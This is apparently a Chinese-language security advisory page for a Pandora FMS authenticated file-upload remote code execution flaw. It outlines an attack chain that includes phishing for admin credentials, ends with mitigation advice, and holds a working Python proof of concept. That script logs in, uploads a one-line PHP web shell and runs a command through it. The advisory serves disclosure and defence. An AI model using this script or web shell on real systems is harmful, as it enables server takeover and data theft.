CVE-2026-30804 CVSS 7.2 高危

CVE-2026-30804 Pandora FMS 远程代码执行漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30804

漏洞类型

远程代码执行 (RCE)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Pandora FMS

漏洞概述

Pandora FMS在版本777至800中存在严重的任意文件上传漏洞。由于系统未对上传文件的类型及内容进行有效验证，拥有高权限的攻击者可上传并执行恶意脚本（如WebShell）。此漏洞可导致服务器被完全控制，进而引发敏感数据泄露、系统篡改及服务中断等严重后果，威胁极高。

技术细节

该漏洞属于不受限制的文件上传类型。在Pandora FMS受影响版本中，文件上传功能缺乏对危险类型（如.php、.jsp）的严格过滤。攻击者需首先获得高权限账户（PR:H），随后利用该接口上传包含恶意代码的文件。由于服务器将上传目录配置为可执行脚本目录，攻击者只需通过浏览器访问该文件URL，即可触发服务器端解析引擎执行恶意代码。利用该漏洞，攻击者可获取系统最高权限，进行任意命令执行，严重危害系统的机密性、完整性和可用性。

攻击链分析

STEP 1

侦察

识别目标Pandora FMS版本，确认其在受影响版本范围内（777-800）。

STEP 2

获取凭证

利用钓鱼或其他手段获取管理员或高权限账户凭据（PR:H要求）。

STEP 3

上传恶意文件

使用高权限账户登录系统，利用文件上传功能上传包含恶意代码的PHP脚本。

STEP 4

执行代码

通过浏览器访问上传的恶意脚本URL，触发服务器解析并执行任意系统命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-ip/pandora_console/index.php"
login_url = "http://target-ip/pandora_console/index.php?login=login"

# Attacker credentials (High Privilege Required)
username = "admin"
password = "password"

# 1. Establish Session and Login
session = requests.Session()
payload = {
    "nick": username,
    "pass": password,
    "login_button": "Login"
}
session.post(login_url, data=payload)

# 2. Upload Malicious File
upload_url = "http://target-ip/pandora_console/index.php?sec=general&sec2=godmode/setup/file_manager"
files = {
    'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}
data = {
    'upload': 'Upload'
}

response = session.post(upload_url, files=files, data=data)

if response.status_code == 200:
    print("[+] File uploaded successfully!")
    # 3. Execute Code
    shell_url = "http://target-ip/pandora_console/images/shell.php"
    cmd_response = session.get(shell_url + "?cmd=whoami")
    print("[+] Command output:", cmd_response.text)
else:
    print("[-] Failed to upload file")

影响范围

Pandora FMS 777

Pandora FMS 778

Pandora FMS 800

防御指南

临时缓解措施

建议立即升级到安全版本。如果无法立即升级，应在Web服务器配置中禁用上传目录（如/images/）的PHP脚本执行权限，并严格限制管理员账户的访问来源IP。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表